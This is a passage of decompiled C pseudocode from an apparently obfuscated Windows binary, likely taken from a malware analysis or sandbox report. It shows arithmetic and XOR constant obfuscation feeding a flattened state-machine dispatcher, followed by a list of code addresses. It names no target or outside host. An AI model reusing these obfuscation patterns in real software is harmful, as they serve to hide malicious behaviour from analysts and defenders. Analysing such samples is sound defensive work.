				signed int _v548;
				unsigned int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				unsigned int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _t1114;
				signed int _t1118;
				signed int _t1122;
				signed int _t1124;
				signed int _t1125;
				signed int _t1130;
				void* _t1134;
				signed int _t1141;
				signed int _t1190;
				signed int _t1191;
				signed int _t1193;
				signed int _t1194;
				signed int _t1195;
				signed int _t1196;
				signed int _t1197;
				signed int _t1198;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				signed int _t1202;
				signed int _t1203;
				signed int _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1313;
				signed int _t1314;
				signed int _t1317;
				signed int _t1343;
				void* _t1345;
				void* _t1348;
				void* _t1349;
				void* _t1350;

				_t1345 = (_t1343 & 0xfffffff8) - 0x278;
				_v372 = 0xaca17;
				_v372 = _v372 << 9;
				_v372 = _v372 ^ 0xc9927700;
				_v372 = _v372 ^ 0xdc065802;
				_v560 = 0xa158a0;
				_v560 = _v560 + 0xffff5dcd;
				_v560 = _v560 ^ 0x175bafac;
				_v560 = _v560 + 0xffff9e49;
				_v560 = _v560 ^ 0x17fab80a;
				_v288 = 0xd4a9a6;
				_v288 = _v288 >> 3;
				_v288 = _v288 ^ 0x001a9534;
				_v504 = 0xe9a5d3;
				_v504 = _v504 << 0xa;
				_v504 = _v504 | 0xea5982c0;
				_t1190 = 0x5f;
				_v504 = _v504 / _t1190;
				_v504 = _v504 ^ 0x028f5db6;
				_t1317 = 0x5d794ec;
				_v304 = 0x85b0a3;
				_v304 = _v304 | 0x2bca024a;
				_v304 = _v304 ^ 0x2bcc012b;
				_v556 = 0x1ecc82;
				_v556 = _v556 | 0xf08df0d8;
				_v556 = _v556 + 0xa531;
				_v556 = _v556 ^ 0xfe698427;
				_v556 = _v556 ^ 0x0ecdaa65;
				_v300 = 0x8f610e;
				_v300 = _v300 + 0xfe33;
				_v300 = _v300 ^ 0x0094e207;
				_v600 = 0x1cab4a;
				_t1193 = 0x18;
				_v600 = _v600 / _t1193;
				_v600 = _v600 + 0xffff3801;
				_v600 = _v600 + 0x515c;
				_v600 = _v600 ^ 0x0001e7c9;
				_v568 = 0xbab742;
				_v568 = _v568 + 0xcc5d;
				_v568 = _v568 | 0x5c48aa02;
				_t1194 = 0x5e;
				_v568 = _v568 / _t1194;
				_v568 = _v568 ^ 0x00f9db2d;
				_v576 = 0x767b63;
				_v576 = _v576 >> 3;
				_v576 = _v576 + 0xd487;
				_v576 = _v576 >> 0x10;
				_v576 = _v576 ^ 0x00061026;
				_v628 = 0xe4759e;
				_v628 = _v628 ^ 0xa26bb658;
				_v628 = _v628 * 0x1d;
				_v628 = _v628 ^ 0xba259216;
				_v628 = _v628 ^ 0xd068fc76;
				_v500 = 0xe51d81;
				_v500 = _v500 >> 7;
				_v500 = _v500 + 0xc085;
				_v500 = _v500 * 0x6e;
				_v500 = _v500 ^ 0x01113a52;
				_v512 = 0xc902c8;
				_v512 = _v512 >> 3;
				_v512 = _v512 >> 3;
				_v512 = _v512 >> 7;
				_v512 = _v512 ^ 0x0003c164;
				_v532 = 0xda62af;
				_v532 = _v532 ^ 0x7c695b99;
				_v532 = _v532 >> 0xd;
				_v532 = _v532 >> 6;
				_v532 = _v532 ^ 0x0009f043;
				_v604 = 0x69f539;
				_v604 = _v604 << 0xd;
				_v604 = _v604 + 0xffffd530;
				_v604 = _v604 + 0xffffaf77;
				_v604 = _v604 ^ 0x3ead80db;
				_v384 = 0xab9f19;
				_t1195 = 0xf;
				_t1313 = 0x50;
				_v384 = _v384 * 0x15;
				_v384 = _v384 * 9;
				_v384 = _v384 ^ 0x7eb18135;
				_v256 = 0xb5a6bd;
				_v256 = _v256 | 0x1f71a96d;
				_v256 = _v256 ^ 0x1ffe1878;
				_v264 = 0xca80f7;
				_v264 = _v264 ^ 0x226a3f90;
				_v264 = _v264 ^ 0x22af4e12;
				_v432 = 0x1b5a57;
				_v432 = _v432 << 0xa;
				_v432 = _v432 | 0x8c1547fb;
				_v432 = _v432 ^ 0xed77fd98;
				_v312 = 0xf59d00;
				_v312 = _v312 | 0xee7978e1;
				_v312 = _v312 ^ 0xeef23383;
				_v608 = 0x388a49;
				_v608 = _v608 ^ 0x20b0147d;
				_v608 = _v608 | 0x120a0452;
				_v608 = _v608 / _t1195;
				_v608 = _v608 ^ 0x035d442e;
				_v632 = 0x8bfb5e;
				_v632 = _v632 / _t1313;
				_v632 = _v632 | 0x8005d6ab;
				_v632 = _v632 + 0xbf6f;
				_v632 = _v632 ^ 0x80035879;
				_v624 = 0xe5ec6;
				_v624 = _v624 << 2;
				_v624 = _v624 >> 9;
				_v624 = _v624 | 0xadaec6d6;
				_v624 = _v624 ^ 0xada90310;
				_v392 = 0x144ef;
				_t1196 = 0x44;
				_v392 = _v392 / _t1196;
				_v392 = _v392 + 0xc90b;
				_v392 = _v392 ^ 0x0000cf97;
				_v236 = 0xf3d10d;
				_t1197 = 0x4a;
				_v236 = _v236 * 0x7a;
				_v236 = _v236 ^ 0x74330487;
				_v324 = 0xc3c34b;
				_v324 = _v324 * 0x6c;
				_v324 = _v324 ^ 0x529af392;
				_v520 = 0x2a70ca;
				_v520 = _v520 / _t1197;
				_v520 = _v520 >> 4;
				_v520 = _v520 ^ 0x2a4d5a72;
				_v520 = _v520 ^ 0x2a4dbf28;
				_v340 = 0xc9c056;
				_t1198 = 7;
				_v340 = _v340 * 0x23;
				_v340 = _v340 | 0xe2238341;
				_v340 = _v340 ^ 0xfbb710ef;
				_v248 = 0x9a54c0;
				_v248 = _v248 | 0xe08ac880;
				_v248 = _v248 ^ 0xe09bcbd4;
				_v348 = 0xe0760;
				_v348 = _v348 << 7;
				_v348 = _v348 + 0x49a3;
				_v348 = _v348 ^ 0x070edb7d;
				_v356 = 0xf94015;
				_v356 = _v356 * 0x4d;
				_v356 = _v356 << 1;
				_v356 = _v356 ^ 0x95f7b4be;
				_v320 = 0x1268a5;
				_v320 = _v320 / _t1198;
				_v320 = _v320 ^ 0x00080ceb;
				_v396 = 0xbdcf3e;
				_t1199 = 0x4b;
				_v396 = _v396 * 0x4d;
				_v396 = _v396 >> 2;
				_v396 = _v396 ^ 0x0e48dd39;
				_v596 = 0x7780dd;
				_v596 = _v596 << 0xd;
				_v596 = _v596 | 0xdff7e7fd;
				_v596 = _v596 ^ 0xfff000ad;
				_v492 = 0x5c66b3;
				_v492 = _v492 * 0x2a;
				_v492 = _v492 ^ 0xe8f32aee;
				_v492 = _v492 >> 0xd;
				_v492 = _v492 ^ 0x000eb956;
				_v316 = 0x3e4fae;
				_v316 = _v316 >> 3;
				_v316 = _v316 ^ 0x00075837;
				_v344 = 0xe0dcd8;
				_v344 = _v344 >> 1;
				_v344 = _v344 + 0xffff4400;
				_v344 = _v344 ^ 0x0066aca9;
				_v460 = 0xbe16e8;
				_v460 = _v460 * 0x45;
				_v460 = _v460 ^ 0x56f71a5b;
				_v460 = _v460 / _t1199;
				_v460 = _v460 ^ 0x0158823c;
				_v588 = 0x54b44f;
				_v588 = _v588 ^ 0xc5cf08f3;
				_v588 = _v588 ^ 0x4b1db793;
				_v588 = _v588 >> 0xb;
				_v588 = _v588 ^ 0x00183ace;
				_v524 = 0xbfc9bb;
				_t1200 = 0x67;
				_v524 = _v524 * 0x4d;
				_v524 = _v524 * 0x71;
				_v524 = _v524 << 1;
				_v524 = _v524 ^ 0xed1ab829;
				_v376 = 0x55c29;
				_v376 = _v376 << 0xc;
				_v376 = _v376 ^ 0xdae248eb;
				_v376 = _v376 ^ 0x8f2c7d73;
				_v424 = 0x330008;
				_v424 = _v424 << 0xb;
				_v424 = _v424 / _t1200;
				_v424 = _v424 ^ 0x017d7462;
				_v580 = 0xb4c97;
				_v580 = _v580 | 0x569d8b1e;
				_v580 = _v580 >> 1;
				_t1201 = 3;
				_v580 = _v580 / _t1201;
				_v580 = _v580 ^ 0x0e68230a;
				_v328 = 0x695dff;
				_v328 = _v328 ^ 0x424f14af;
				_v328 = _v328 ^ 0x4224025c;
				_v284 = 0xae8351;
				_t1202 = 0x57;
				_v284 = _v284 * 0x60;
				_v284 = _v284 ^ 0x417e5081;
				_v444 = 0x78eba1;
				_v444 = _v444 * 0x5f;
				_v444 = _v444 ^ 0x00193e0b;
				_v444 = _v444 ^ 0x2cc98685;
				_v592 = 0x15a443;
				_v592 = _v592 / _t1202;
				_v592 = _v592 + 0xffff9c6f;
				_v592 = _v592 >> 5;
				_v592 = _v592 ^ 0x07f20231;
				_v216 = 0x5d0672;
				_v216 = _v216 << 3;
				_v216 = _v216 ^ 0x02ee7d7e;
				_v548 = 0xb50861;
				_v548 = _v548 >> 0xc;
				_v548 = _v548 << 0xf;
				_v548 = _v548 + 0xffffef54;
				_v548 = _v548 ^ 0x05ac6923;
				_v452 = 0x2163b6;
				_v452 = _v452 | 0xbb60e7c3;
				_v452 = _v452 ^ 0x0d3b8c6d;
				_v452 = _v452 ^ 0xb65710e5;
				_v636 = 0x61f3a7;
				_v636 = _v636 + 0xffff300f;
				_v636 = _v636 << 1;
				_v636 = _v636 * 0x27;
				_v636 = _v636 ^ 0x1d9bc7e7;
				_v224 = 0x725254;
				_v224 = _v224 + 0xfffffac1;
				_v224 = _v224 ^ 0x007e9bc6;
				_v228 = 0xd6200c;
				_v228 = _v228 ^ 0x5ef32346;
				_v228 = _v228 ^ 0x5e2a0e2d;
				_v540 = 0xc12668;
				_v540 = _v540 << 8;
				_v540 = _v540 * 0x51;
				_v540 = _v540 + 0xffff6981;
				_v540 = _v540 ^ 0x1d2c502d;
				_v496 = 0x68726f;
				_v496 = _v496 + 0xb8c4;
				_v496 = _v496 + 0xffff3269;
				_v496 = _v496 << 1;
				_v496 = _v496 ^ 0x00d37668;
				_v296 = 0x65f16b;
				_v296 = _v296 ^ 0xac840f83;
				_v296 = _v296 ^ 0xace8f4ad;
				_v336 = 0xf34185;
				_v336 = _v336 + 0xffff7084;
				_v336 = _v336 ^ 0x22f89925;
				_v336 = _v336 ^ 0x2207d32f;
				_v400 = 0x9220b0;
				_v400 = _v400 | 0xa2c46701;
				_v400 = _v400 + 0x1a14;
				_v400 = _v400 ^ 0xa2d5ce26;
				_v368 = 0x18190f;
				_v368 = _v368 * 0x6c;
				_t1203 = 0x47;
				_v368 = _v368 * 0x49;
				_v368 = _v368 ^ 0xe62bbbec;
				_v276 = 0x664929;
				_v276 = _v276 + 0xffffab3c;
				_v276 = _v276 ^ 0x0066f8be;
				_v420 = 0x55fac4;
				_v420 = _v420 / _t1203;
				_v420 = _v420 | 0x23698c02;
				_v420 = _v420 ^ 0x23676b12;
				_v428 = 0x2d8f3d;
				_v428 = _v428 ^ 0xcbbc8554;
				_v428 = _v428 + 0xffff5f5b;
				_v428 = _v428 ^ 0xcb969d3b;
				_v408 = 0x7d0ed3;
				_t1204 = 0x33;
				_v408 = _v408 / _t1204;
				_v408 = _v408 ^ 0x03ccba73;
				_v408 = _v408 ^ 0x03c41a74;
				_v212 = 0xf1bcf;
				_v212 = _v212 | 0xafbe7d4b;
				_v212 = _v212 ^ 0xafbe5483;
				_v476 = 0x76a0ac;
				_v476 = _v476 << 0xa;
				_v476 = _v476 << 2;
				_v476 = _v476 >> 6;
				_v476 = _v476 ^ 0x01aadd1c;
				_v252 = 0xacd74c;
				_v252 = _v252 + 0xffffc13c;
				_v252 = _v252 ^ 0x00a0cd5e;
				_v232 = 0x48ff42;
				_t1205 = 0x1a;
				_v232 = _v232 / _t1205;
				_v232 = _v232 ^ 0x0005b06f;
				_v620 = 0x68b0f8;
				_v620 = _v620 | 0x9e72bceb;
				_v620 = _v620 ^ 0x53ebce50;
				_v620 = _v620 + 0x60e9;
				_v620 = _v620 ^ 0xcd9386df;
				_v572 = 0xa5dd6d;
				_v572 = _v572 << 0xb;
				_t1206 = 0x6b;
				_v572 = _v572 / _t1206;
				_v572 = _v572 + 0xe547;
				_v572 = _v572 ^ 0x00701f50;
				_v516 = 0x27ee1e;
				_v516 = _v516 + 0x5114;
				_v516 = _v516 ^ 0xd07a9b41;
				_v516 = _v516 ^ 0x4a8a2a52;
				_v516 = _v516 ^ 0x9ad4de84;
				_v484 = 0xc04b63;
				_v484 = _v484 >> 3;
				_v484 = _v484 >> 4;
				_v484 = _v484 + 0xffff6956;
				_v484 = _v484 ^ 0x000f5fa9;
				_v416 = 0x10eb88;
				_v416 = _v416 | 0xd8fa91ef;
				_v416 = _v416 ^ 0xf957ef44;
				_v416 = _v416 ^ 0x21a34ff6;
				_v412 = 0xf4f2f5;
				_v412 = _v412 + 0xffff8ffc;
				_v412 = _v412 + 0xffff7090;
				_v412 = _v412 ^ 0x00f029cf;
				_v268 = 0xc7943e;
				_v268 = _v268 << 0x10;
				_v268 = _v268 ^ 0x94371f3e;
				_v544 = 0x509d95;
				_v544 = _v544 >> 0xa;
				_v544 = _v544 >> 0xf;
				_v544 = _v544 >> 0xa;
				_v544 = _v544 ^ 0x0008d406;
				_v552 = 0x34f7be;
				_v552 = _v552 / _t1190;
				_v552 = _v552 >> 0x10;
				_v552 = _v552 >> 5;
				_v552 = _v552 ^ 0x0008c95b;
				_v404 = 0x94eb91;
				_v404 = _v404 ^ 0x41984e3b;
				_v404 = _v404 << 3;
				_v404 = _v404 ^ 0x08661611;
				_v220 = 0x500384;
				_v220 = _v220 ^ 0xbbdae5ed;
				_v220 = _v220 ^ 0xbb8779fc;
				_v448 = 0x89f4a;
				_t1207 = 0x66;
				_v448 = _v448 * 0x78;
				_v448 = _v448 / _t1313;
				_v448 = _v448 ^ 0x000df59a;
				_v292 = 0x19f8d0;
				_v292 = _v292 >> 0xf;
				_v292 = _v292 ^ 0x0007f69a;
				_v616 = 0x49d3c1;
				_v616 = _v616 | 0x94d46b10;
				_v616 = _v616 >> 0xe;
				_v616 = _v616 | 0x382c489e;
				_v616 = _v616 ^ 0x382cb35c;
				_v440 = 0x57429d;
				_v440 = _v440 << 0x10;
				_v440 = _v440 + 0x8d95;
				_v440 = _v440 ^ 0x429b4669;
				_v612 = 0x469ad0;
				_v612 = _v612 ^ 0xa9c1a766;
				_v612 = _v612 | 0x8fd1d886;
				_v612 = _v612 << 1;
				_v612 = _v612 ^ 0x5faedd57;
				_v244 = 0xe276bf;
				_v244 = _v244 * 0x1a;
				_v244 = _v244 ^ 0x170afa50;
				_v352 = 0x60bcf5;
				_v352 = _v352 + 0xf9c7;
				_v352 = _v352 ^ 0xebf612c1;
				_v352 = _v352 ^ 0xeb9276cf;
				_v488 = 0xa1517b;
				_v488 = _v488 / _t1207;
				_t1208 = 0x68;
				_v488 = _v488 * 0x65;
				_v488 = _v488 >> 0xc;
				_v488 = _v488 ^ 0x00034996;
				_v388 = 0x73cbfd;
				_v388 = _v388 << 5;
				_v388 = _v388 / _t1208;
				_v388 = _v388 ^ 0x002375e2;
				_v480 = 0x418d4e;
				_v480 = _v480 + 0xffffa3b5;
				_v480 = _v480 + 0x7686;
				_v480 = _v480 << 6;
				_v480 = _v480 ^ 0x106d4c13;
				_v380 = 0xc2a320;
				_t1209 = 0x12;
				_v380 = _v380 / _t1209;
				_t1210 = 0x3b;
				_v380 = _v380 * 0x3d;
				_v380 = _v380 ^ 0x02970ee8;
				_v272 = 0xffa302;
				_v272 = _v272 << 0xb;
				_v272 = _v272 ^ 0xfd1abd55;
				_v280 = 0x15da71;
				_v280 = _v280 | 0xb4bf3799;
				_v280 = _v280 ^ 0xb4b9b38f;
				_v364 = 0xb2440c;
				_v364 = _v364 >> 0xb;
				_v364 = _v364 ^ 0x4809a963;
				_v364 = _v364 ^ 0x4806c3ec;
				_v472 = 0xfa5982;
				_v472 = _v472 * 0x42;
				_v472 = _v472 | 0xea19613e;
				_v472 = _v472 + 0x3c8a;
				_v472 = _v472 ^ 0xea9293e6;
				_v464 = 0xd5ed68;
				_v464 = _v464 << 3;
				_v464 = _v464 << 0x10;
				_v464 = _v464 << 0xc;
				_v464 = _v464 ^ 0x00064bb9;
				_v240 = 0xe6b6f4;
				_v240 = _v240 + 0xffffaad8;
				_v240 = _v240 ^ 0x00e3249b;
				_v360 = 0x591b06;
				_v360 = _v360 / _t1210;
				_v360 = _v360 ^ 0x000e8e51;
				_v456 = 0xd9b586;
				_v456 = _v456 << 7;
				_t1211 = 0x77;
				_v456 = _v456 / _t1211;
				_v456 = _v456 ^ 0x2d3aa422;
				_v456 = _v456 ^ 0x2dd2b0e0;
				_v468 = 0xee071b;
				_t1212 = 0x17;
				_v468 = _v468 / _t1212;
				_v468 = _v468 + 0xffff215c;
				_t1213 = 0x1e;
				_v468 = _v468 / _t1213;
				_v468 = _v468 ^ 0x01343549;
				_v508 = 0x51d736;
				_v508 = _v508 ^ 0xe0f7e333;
				_v508 = _v508 ^ 0x46175d01;
				_v508 = _v508 << 0xb;
				_v508 = _v508 ^ 0x8b480710;
				_v332 = 0x8a6fa0;
				_v332 = _v332 << 4;
				_v332 = _v332 * 0x66;
				_v332 = _v332 ^ 0x72879c01;
				_v436 = 0x22afa8;
				_v436 = _v436 ^ 0xb7db44c6;
				_v436 = _v436 + 0x54fa;
				_v436 = _v436 ^ 0xb7fa4fc8;
				_v584 = 0x2b296e;
				_t833 =  &_v584; // 0x2b296e
				_t1214 = 0x7d;
				_t1314 = _v360;
				_v584 =  *_t833 * 0x69;
				_v584 = _v584 ^ 0x4f8ca6ed;
				_v584 = _v584 + 0xffff6423;
				_v584 = _v584 ^ 0x5e3ea256;
				_v564 = 0x8d053b;
				_t1191 = _v360;
				_v564 = _v564 * 0x58;
				_v564 = _v564 >> 0xa;
				_v564 = _v564 / _t1214;
				_v564 = _v564 ^ 0x000da371;
				_v208 = 0xe7280f;
				_v208 = _v208 << 4;
				_v208 = _v208 ^ 0x0e7f3b50;
				_v308 = 0xd716a5;
				_v308 = _v308 << 6;
				_v308 = _v308 ^ 0x35cb5d60;
				_v260 = 0x2bcd88;
				_t1215 = 0x69;
				_v260 = _v260 * 0x56;
				_v260 = _v260 ^ 0x0eb9ff90;
				_v536 = 0x561f85;
				_v536 = _v536 + 0x28c2;
				_v536 = _v536 ^ 0x7eb81cd4;
				_v536 = _v536 + 0xfffffcfb;
				_v536 = _v536 ^ 0x7eee24be;
				_v528 = 0xd9e61a;
				_v528 = _v528 | 0x5cf69c57;
				_v528 = _v528 / _t1215;
				_v528 = _v528 * 0x70;
				_v528 = _v528 ^ 0x6333db70;
				goto L1;
				do {
					while(1) {
						L1:
						_t1348 = _t1317 - 0x6397bd0;
						if(_t1348 > 0) {
							break;
						}
						if(_t1348 == 0) {
							E007A66CA();
							_t1317 = 0x525d695;
							continue;
						}
						_t1349 = _t1317 - 0x3d71c3c;
						if(_t1349 > 0) {
							__eflags = _t1317 - 0x525d695;
							if(__eflags > 0) {
								__eflags = _t1317 - 0x53c3717;
								if(_t1317 == 0x53c3717) {
									_t1118 = E007A1FFB();
									__eflags = _t1118;
									if(_t1118 == 0) {
										_t1125 = E007B0056();
									}
									L27:
									_t1317 = 0xc4dcd;
									continue;
								}
								__eflags = _t1317 - 0x56efd44;
								if(_t1317 == 0x56efd44) {
									E007A95FA();
									_t1122 = E007A1FFB();
									asm("sbb esi, esi");
									_t1317 = ( ~_t1122 & 0xfebaa250) + 0x8c1c67e;
									continue;
								}
								__eflags = _t1317 - 0x5d794ec;
								if(_t1317 == 0x5d794ec) {
									_t1317 = 0xd7f216f;
									continue;
								}
								__eflags = _t1317 - 0x5dcd6da;
								if(_t1317 != 0x5dcd6da) {
									goto L109;
								}
								_t1125 = E007AC110(_v336,  &_v152, _v400, _v368);
								_t1317 = 0x6eeee91;
								continue;
							}
							if(__eflags == 0) {
								_t1125 = E007959F2();
								__eflags = _t1125;
								if(_t1125 == 0) {
									L114:
									return _t1125;
								}
								_t1317 = 0x56efd44;
								continue;
							}
							__eflags = _t1317 - 0x3fc5519;
							if(_t1317 == 0x3fc5519) {
								_v144 = E007A20B0();
								_t1125 = E007A1DDD(_v452, _t1152, _v636, _v224);
								_pop(_t1237);
								_v140 = _t1125;
								_t1317 = 0xa74297b;
								continue;
							}
							__eflags = _t1317 - 0x42dc4f0;
							if(_t1317 == 0x42dc4f0) {
								_t1125 = _v468;
								_t1317 = 0x4cdd8ae;
								_v112 = _t1125;
								continue;
							}
							__eflags = _t1317 - 0x4a24b69;
							if(_t1317 == 0x4a24b69) {
								_t1125 = E007A0326();
								_t1317 = 0x8690ed6;
								continue;
							}
							__eflags = _t1317 - 0x4cdd8ae;
							if(_t1317 != 0x4cdd8ae) {
								goto L109;
							}
							_t1125 = _v508;
							_t1317 = 0x5dcd6da;
							_v124 = _t1125;
							continue;
						}
						if(_t1349 == 0) {
							E007A8519(_v244, _v352, _v188);
							L34:
							_t1317 = 0xe4333b3;
							continue;
						}
						_t1350 = _t1317 - 0x27d9d92;
						if(_t1350 > 0) {
							__eflags = _t1317 - 0x2a998d8;
							if(_t1317 == 0x2a998d8) {
								_t1124 = E00791A56( &_v180,  &_v84, _v572, _v516);
								__eflags = _t1124;
								if(_t1124 != 0) {
									_t1125 = _v28;
									__eflags = _t1125 - 8;
									if(_t1125 != 8) {
										__eflags = _t1125;
										if(_t1125 == 0) {
											L32:
											_t1317 = 0xa65551a;
											continue;
										}
										__eflags = _t1125 - 1;
										if(_t1125 != 1) {
											goto L27;
										}
										goto L32;
									}
									_t1317 = 0xc1a4fe5;
									continue;
								}
								_t1125 = E007A0AE0(_v308, _v564);
								_pop(_t1237);
								_t1314 = _t1125;
								_t1191 = 0x5dcd6da;
								goto L27;
							}
							__eflags = _t1317 - 0x2cf0ed0;
							if(_t1317 == 0x2cf0ed0) {
								_t1125 = E007ACB5B(_v340, _v248, _v348, _v356);
								goto L114;
							}
							__eflags = _t1317 - 0x3250d84;
							if(__eflags == 0) {
								_v196 = E007A7BA6( &_v192, _v596, __eflags, _v492, 0x791444);
								_v204 = E007A7BA6( &_v200, _v316, __eflags, _v344, 0x7914b4);
								_t1130 = E00795361(_v460, _v524,  &_v196,  &_v204);
								_t1345 = _t1345 + 0x1c;
								asm("sbb esi, esi");
								_t1317 = ( ~_t1130 & 0xfa5ce13e) + 0xccbb739;
								E0079A8B0(_v376, _v204, _v424);
								_t1125 = E0079A8B0(_v580, _v196, _v328);
								goto L109;
							}
							__eflags = _t1317 - 0x3ace1b1;
							if(_t1317 != 0x3ace1b1) {
								goto L109;
							}
							_t1125 = E007A473C();
							_t1317 = 0xc245297;
							continue;
						}
						if(_t1350 == 0) {
							_t1141 = E007A4116();
							__eflags = _t1141;
							if(_t1141 == 0) {
								_t1125 = E007A1FFB();
								asm("sbb esi, esi");
								_t1317 = ( ~_t1125 & 0xf7888f1a) + 0xc245297;
							} else {
								_t1125 = E007A1FFB();
								asm("sbb esi, esi");
								_t1317 = ( ~_t1125 & 0x013fceb9) + 0xc7d9b3b;
							}
							continue;
						}
						if(_t1317 == 0xc4dcd) {
							_t1125 = E007A8519(_v440, _v612, _v180);
							_t1317 = 0x3d71c3c;
							continue;
						}
						if(_t1317 == 0x283259) {
							_t1125 = E007964E2(_v476, _v332, _v252,  &_v188, E00794E74(), _v232, _v620,  &_v180);
							_t1345 = _t1345 + 0x18;
							asm("sbb esi, esi");
							_t1317 = ( ~_t1125 & 0x0281667f) + 0x283259;
							continue;
						}
						if(_t1317 == 0x1b53ec1) {
							_t1125 = E007A87D1();
							_v104 = _t1125;
							_t1317 = 0xfa2c753;
							continue;
						}
						if(_t1317 != 0x1f27ca8) {
							goto L109;
						}
						_t1125 = E007A20BA();
						if(_t1125 == 0) {
							goto L114;
						} else {
							_t1317 = 0xa7d0a44;
							continue;
						}
					}
					__eflags = _t1317 - 0xa7d0a44;
					if(__eflags > 0) {
						__eflags = _t1317 - 0xd7f216f;
						if(__eflags > 0) {
							__eflags = _t1317 - 0xdbd69f4;
							if(_t1317 == 0xdbd69f4) {
								_t1114 = E007A9BCF();
								__eflags = _t1114;
								if(_t1114 != 0) {
									L85:
									_t1317 = 0x2cf0ed0;
									goto L1;
								}
								_t1317 = 0xc7d9b3b;
								goto L109;
							}
							__eflags = _t1317 - 0xe4333b3;
							if(_t1317 == 0xe4333b3) {
								__eflags = _t1314 - _v288;
								if(_t1314 == _v288) {
									L106:
									_t1317 = _t1191;
									goto L109;
								}
								_t1134 = E00794E74();
								_t1237 = _v480;
								_t1125 = E00798DC4(_v480, _v380, _v272, _v280, _t1134, _t1314);
								_t1345 = _t1345 + 0x10;
								__eflags = _t1125 - _v372;
								if(_t1125 == _v372) {
									_t1125 = E00796D24();
									goto L106;
								}
								_t1317 = 0x942db73;
								goto L1;
							}
							__eflags = _t1317 - 0xfa2c753;
							if(_t1317 != 0xfa2c753) {
								goto L109;
							}
							_t1125 = E007AD2CE(_t1237);
							_v172 = _t1125;
							_t1317 = 0x42dc4f0;
							goto L1;
						}
						if(__eflags == 0) {
							_t1125 = E007A7D48(_t1237, __eflags);
							__eflags = _t1125;
							if(_t1125 == 0) {
								goto L114;
							}
							_t1317 = 0x4a24b69;
							goto L1;
						}
						__eflags = _t1317 - 0xb2497b0;
						if(_t1317 == 0xb2497b0) {
							_t1125 = E0079DFF3();
							_t1317 = 0x3250d84;
							goto L1;
						}
						__eflags = _t1317 - 0xc1a4fe5;
						if(_t1317 == 0xc1a4fe5) {
							_t1125 = E007A7DD5();
							goto L114;
						}
						__eflags = _t1317 - 0xc245297;
						if(_t1317 == 0xc245297) {
							_t1125 = E007A8BE3();
							_t1317 = 0x6397bd0;
							goto L1;
						}
						__eflags = _t1317 - 0xc7d9b3b;
						if(_t1317 != 0xc7d9b3b) {
							goto L109;
						}
						_t1125 = E007951BB();
						_t1317 = 0xb2497b0;
						goto L1;
					}
					if(__eflags == 0) {
						_t1125 = E007A9EEC();
						asm("sbb esi, esi");
						_t1317 = ( ~_t1125 & 0x03bbde3e) + 0x27d9d92;
						goto L1;
					}
					__eflags = _t1317 - 0x8955e2f;
					if(__eflags > 0) {
						__eflags = _t1317 - 0x8c1c67e;
						if(_t1317 == 0x8c1c67e) {
							_t1125 = E007A1EE7();
							goto L85;
						}
						__eflags = _t1317 - 0x942db73;
						if(_t1317 == 0x942db73) {
							_t1125 = E007991B0(_t1237);
							goto L114;
						}
						__eflags = _t1317 - 0xa65551a;
						if(_t1317 == 0xa65551a) {
							_t1125 = E0079B2C7(_v412, _v268,  &_v36);
							_pop(_t1237);
							__eflags = _t1125;
							if(_t1125 == 0) {
								_t1125 = _v28;
								__eflags = _t1125;
								if(_t1125 == 0) {
									_t1314 = E007A0AE0(_v260, _v208);
									_t1125 = _v28;
									_pop(_t1237);
								}
								__eflags = _t1125 - 1;
								if(_t1125 == 1) {
									_t1125 = E007A0AE0(_v528, _v536);
									_pop(_t1237);
									_t1314 = _t1125;
								}
							} else {
								_t1314 = _v560;
							}
							_t1191 = 0x5dcd6da;
							_t1317 = 0x53c3717;
							goto L1;
						}
						__eflags = _t1317 - 0xa74297b;
						if(_t1317 != 0xa74297b) {
							goto L109;
						}
						_t1125 = E007975F1();
						_v100 = _t1125;
						_t1317 = 0x1b53ec1;
						goto L1;
					}
					if(__eflags == 0) {
						_t1125 = E007AE1D4();
						__eflags = _t1125;
						if(_t1125 == 0) {
							goto L114;
						}
						_t1317 = 0x1f27ca8;
						goto L1;
					}
					__eflags = _t1317 - 0x6eeee91;
					if(_t1317 == 0x6eeee91) {
						_t1237 = _v276;
						_t1125 = E00792251(_v276,  &_v188,  &_v172, _v420, _v428);
						_t1345 = _t1345 + 0xc;
						asm("sbb esi, esi");
						_t1317 = ( ~_t1125 & 0xfc51161d) + 0x3d71c3c;
						goto L1;
					}
					__eflags = _t1317 - 0x7289877;
					if(_t1317 == 0x7289877) {
						E007AE1D4();
						_t1191 = 0x3fc5519;
						_t1125 = E007A0AE0(_v584, _v436);
						_t1314 = _t1125;
						goto L34;
					}
					__eflags = _t1317 - 0x77c68ce;
					if(_t1317 == 0x77c68ce) {
						_t1125 = E007A5CC4();
						_t1317 = 0x8c1c67e;
						goto L1;
					}
					__eflags = _t1317 - 0x8690ed6;
					if(_t1317 != 0x8690ed6) {
						goto L109;
					}
					_t1125 = E007A044F();
					__eflags = _t1125;
					if(_t1125 == 0) {
						goto L114;
					}
					_t1317 = 0x8955e2f;
					goto L1;
					L109:
					__eflags = _t1317 - 0xccbb739;
				} while (_t1317 != 0xccbb739);
				goto L114;
			}









































































































































































                                                                                                                          0x007a2556
                                                                                                                          0x007a255c
                                                                                                                          0x007a2569
                                                                                                                          0x007a2571
                                                                                                                          0x007a257c
                                                                                                                          0x007a2587
                                                                                                                          0x007a258f
                                                                                                                          0x007a2597
                                                                                                                          0x007a259f
                                                                                                                          0x007a25a7
                                                                                                                          0x007a25af
                                                                                                                          0x007a25ba
                                                                                                                          0x007a25c2
                                                                                                                          0x007a25cd
                                                                                                                          0x007a25d8
                                                                                                                          0x007a25e0
                                                                                                                          0x007a25f8
                                                                                                                          0x007a25fd
                                                                                                                          0x007a2606
                                                                                                                          0x007a2611
                                                                                                                          0x007a2616
                                                                                                                          0x007a2621
                                                                                                                          0x007a262c
                                                                                                                          0x007a2637
                                                                                                                          0x007a263f
                                                                                                                          0x007a2647
                                                                                                                          0x007a264f
                                                                                                                          0x007a2657
                                                                                                                          0x007a265f
                                                                                                                          0x007a266a
